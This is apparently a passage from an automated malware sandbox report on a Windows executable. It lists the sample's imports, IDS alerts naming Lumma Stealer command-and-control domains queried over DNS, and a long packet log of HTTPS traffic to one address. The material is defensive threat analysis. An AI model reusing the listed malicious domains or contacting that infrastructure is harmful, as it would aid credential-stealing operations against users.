                                                                                                                                                                        MSVCP140.dll_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
                                                                                                                                                                        ntdll.dllRtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                                                                                                                                                                        dwmapi.dllDwmExtendFrameIntoClientArea
                                                                                                                                                                        VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                                                                                                        VCRUNTIME140.dll__std_terminate, memchr, strstr, memcmp, memcpy, __std_exception_destroy, __std_exception_copy, memmove, __current_exception, __current_exception_context, __C_specific_handler, _CxxThrowException, memset
                                                                                                                                                                        api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
                                                                                                                                                                        api-ms-win-crt-string-l1-1-0.dllstrncpy, isprint, strcmp, _stricmp
                                                                                                                                                                        api-ms-win-crt-utility-l1-1-0.dllqsort, rand
                                                                                                                                                                        api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, _callnewh, free, malloc
                                                                                                                                                                        api-ms-win-crt-convert-l1-1-0.dllatof
                                                                                                                                                                        api-ms-win-crt-runtime-l1-1-0.dllsystem, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
                                                                                                                                                                        api-ms-win-crt-math-l1-1-0.dllatan2, atan2f, ceilf, cosf, asin, fmodf, pow, tanf, powf, sqrtf, __setusermatherr, floorf, sinf, sqrt
                                                                                                                                                                        api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _lock_file
                                                                                                                                                                        api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, _configthreadlocale
                                                                                                                                                                        SHELL32.dllShellExecuteW
                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-09-30T18:19:14.537928+02002056172ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)1192.168.2.7494371.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.013492+02002056172ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)1192.168.2.7652631.1.1.153TCP
                                                                                                                                                                        2024-09-30T18:19:15.018204+02002056054ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)1192.168.2.7597761.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.031016+02002056040ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)1192.168.2.7520531.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.051876+02002056056ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)1192.168.2.7612491.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.063865+02002056036ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)1192.168.2.7631351.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.076598+02002056058ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)1192.168.2.7594871.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.089811+02002056046ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)1192.168.2.7604391.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.102262+02002056042ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)1192.168.2.7582301.1.1.153UDP
                                                                                                                                                                        2024-09-30T18:19:15.114119+02002056052ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)1192.168.2.7509571.1.1.153UDP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Sep 30, 2024 18:19:08.871608019 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:08.871671915 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:08.871736050 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:08.881886005 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:08.881902933 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.370851994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.371006012 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.375212908 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.375226974 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.375595093 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.378087044 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.423398972 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508512020 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508580923 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508651018 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.508651972 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508665085 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508708000 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.508719921 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508759975 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508799076 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.508805990 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508944035 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508981943 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.508982897 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.508994102 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.509028912 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.509036064 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.515917063 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.515983105 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.515993118 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.561803102 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.596908092 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597013950 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597084045 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.597098112 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597584963 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597635984 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.597647905 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597898960 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597944975 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.597951889 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.597995043 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.598035097 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.598043919 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.598371983 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.598414898 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.598423004 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.598804951 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.598849058 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.598856926 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.599044085 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.599086046 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.599096060 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.599677086 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.599714994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.599718094 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.599726915 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.599764109 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.600524902 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.601056099 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.601093054 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.601099014 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.601109028 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.601171970 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.601178885 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.658188105 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.658219099 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.687953949 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688024044 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688059092 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.688076973 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688119888 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.688128948 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688431025 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688442945 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688493013 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.688500881 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688906908 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688952923 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688962936 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.688970089 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.688993931 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.689485073 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.689543962 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.689554930 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.689600945 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.689834118 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.689887047 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.689893961 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.689908028 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.689946890 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.691678047 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.691756010 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.691884995 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.691932917 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.692509890 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.692563057 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.692591906 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.692645073 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.692667007 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.692719936 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.692753077 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.692810059 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.693274021 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.693327904 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.693484068 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.693532944 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.778207064 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.778294086 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.778348923 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.778400898 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.778856039 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.778907061 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.779156923 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.779202938 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.779844999 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.779894114 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.780013084 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.780064106 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.780963898 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.781009912 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.781018972 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.781085014 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.781562090 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.781616926 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.782169104 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.782202959 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.782226086 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.782232046 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.782258034 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.783104897 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.783143997 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.783159971 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.783168077 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.783193111 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.783196926 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.783237934 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.783242941 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.783289909 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.784060001 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.784097910 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.784116983 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.784122944 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.784151077 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.784166098 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.785263062 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.785312891 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.785450935 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.785501003 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.786000967 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.786056042 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.786181927 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.786226034 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.786231995 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.786277056 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.786900043 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.786927938 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.786950111 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.786956072 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.786981106 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.787692070 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.787719965 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.787740946 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.787746906 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.787765026 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.788583994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.788636923 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.788645029 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.788687944 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.869160891 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.869213104 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.869266033 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.869276047 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.869309902 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.870276928 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.870295048 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.870364904 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.870374918 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.872060061 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.872077942 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.872144938 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.872157097 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.873940945 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.873955965 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.874011040 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.874018908 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.875657082 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.875673056 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.875732899 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.875742912 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.876355886 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.876370907 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.876429081 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.876439095 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.878091097 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.878104925 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.878161907 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.878170967 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.878216982 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.879076958 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.879091978 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.879132986 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.879139900 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.879168987 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.921195984 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.959834099 CEST44349701188.114.96.3192.168.2.7
